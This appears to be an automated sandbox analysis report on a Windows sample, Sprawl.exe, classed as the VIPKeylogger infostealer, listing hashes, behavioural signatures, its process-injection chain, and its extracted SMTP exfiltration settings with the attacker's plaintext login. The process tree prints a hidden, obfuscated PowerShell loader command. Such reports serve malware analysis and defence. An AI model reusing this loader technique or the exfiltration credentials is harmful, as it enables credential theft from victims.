Analysis
-
max time kernel
142s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 14:03
Static task
static1
Behavioral task
behavioral1
Sample
Sprawl.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Sprawl.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Paraffinerer.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Paraffinerer.ps1
Resource
win10v2004-20241007-en
General
-
Target
Sprawl.exe
-
Size
859KB
-
MD5
47fd98348b7d314e4e9dae46e5f1e1a1
-
SHA1
cafe48404707e61235bfbe6646d8072af4298e21
-
SHA256
125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
-
SHA512
8a1deda7d7e8e80d8b2e62ad0d9d4400b1d865ea322955e577fc439a8a0f1d6d3cb912397ecb6458941fd7fd566c1fdbdf4c4ed02c72234fa543bfcb45db845a
-
SSDEEP
12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
Malware Config
Extracted
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 9 IoCs
Processes:
msiexec.exeflow pid process 52 3228 msiexec.exe 54 3228 msiexec.exe 56 3228 msiexec.exe 60 3228 msiexec.exe 62 3228 msiexec.exe 65 3228 msiexec.exe 67 3228 msiexec.exe 71 3228 msiexec.exe 74 3228 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 64 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 3228 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 4404 powershell.exe 3228 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Sprawl.exepowershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sprawl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exemsiexec.exepid process 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 3228 msiexec.exe 3228 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 4404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
powershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 4404 powershell.exe Token: SeIncreaseQuotaPrivilege 4404 powershell.exe Token: SeSecurityPrivilege 4404 powershell.exe Token: SeTakeOwnershipPrivilege 4404 powershell.exe Token: SeLoadDriverPrivilege 4404 powershell.exe Token: SeSystemProfilePrivilege 4404 powershell.exe Token: SeSystemtimePrivilege 4404 powershell.exe Token: SeProfSingleProcessPrivilege 4404 powershell.exe Token: SeIncBasePriorityPrivilege 4404 powershell.exe Token: SeCreatePagefilePrivilege 4404 powershell.exe Token: SeBackupPrivilege 4404 powershell.exe Token: SeRestorePrivilege 4404 powershell.exe Token: SeShutdownPrivilege 4404 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeSystemEnvironmentPrivilege 4404 powershell.exe Token: SeRemoteShutdownPrivilege 4404 powershell.exe Token: SeUndockPrivilege 4404 powershell.exe Token: SeManageVolumePrivilege 4404 powershell.exe Token: 33 4404 powershell.exe Token: 34 4404 powershell.exe Token: 35 4404 powershell.exe Token: 36 4404 powershell.exe Token: SeDebugPrivilege 3228 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
Sprawl.exepowershell.exedescription pid process target process PID 3788 wrote to memory of 4404 3788 Sprawl.exe powershell.exe PID 3788 wrote to memory of 4404 3788 Sprawl.exe powershell.exe PID 3788 wrote to memory of 4404 3788 Sprawl.exe powershell.exe PID 4404 wrote to memory of 3228 4404 powershell.exe msiexec.exe PID 4404 wrote to memory of 3228 4404 powershell.exe msiexec.exe PID 4404 wrote to memory of 3228 4404 powershell.exe msiexec.exe PID 4404 wrote to memory of 3228 4404 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Sprawl.exe"C:\Users\Admin\AppData\Local\Temp\Sprawl.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3228
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
319KB
MD50333fb2b0e19a85944c9ea2538f15529
SHA1cb7cf6aef6b3409205b0efa337eb5fc4f84fa237
SHA2563529ab40264cb6806cb5ed7e64d98d29b94362987720cd633e4785f41e0163e2
SHA5125fa5102e95fb393e47fea92d7cee9b0f66bfaa94ec0cace06a83bd18413eb9d7968e6973a8843aeb7f9b877418a11e3686f61d326569392ae3e6cb65cc51ea5e
-
Filesize
53KB
MD56f2c225ff02a35f64c6157286f9e90b1
SHA1fdfb286088fd3cb3c3fa39f39e2e7ba48b3c6624
SHA2560f4caa809a6b9ad70a305958af34e60b82f3080bbb7067f316ca85702ffba443
SHA512c5fb4eafb4c29b774648bcec26736ad0808815d10618c95b723de9296240e6f9cbc35e90cc4439266f013810f16dde0f44a840fa928d8be2a8562cc5ac8d2eb5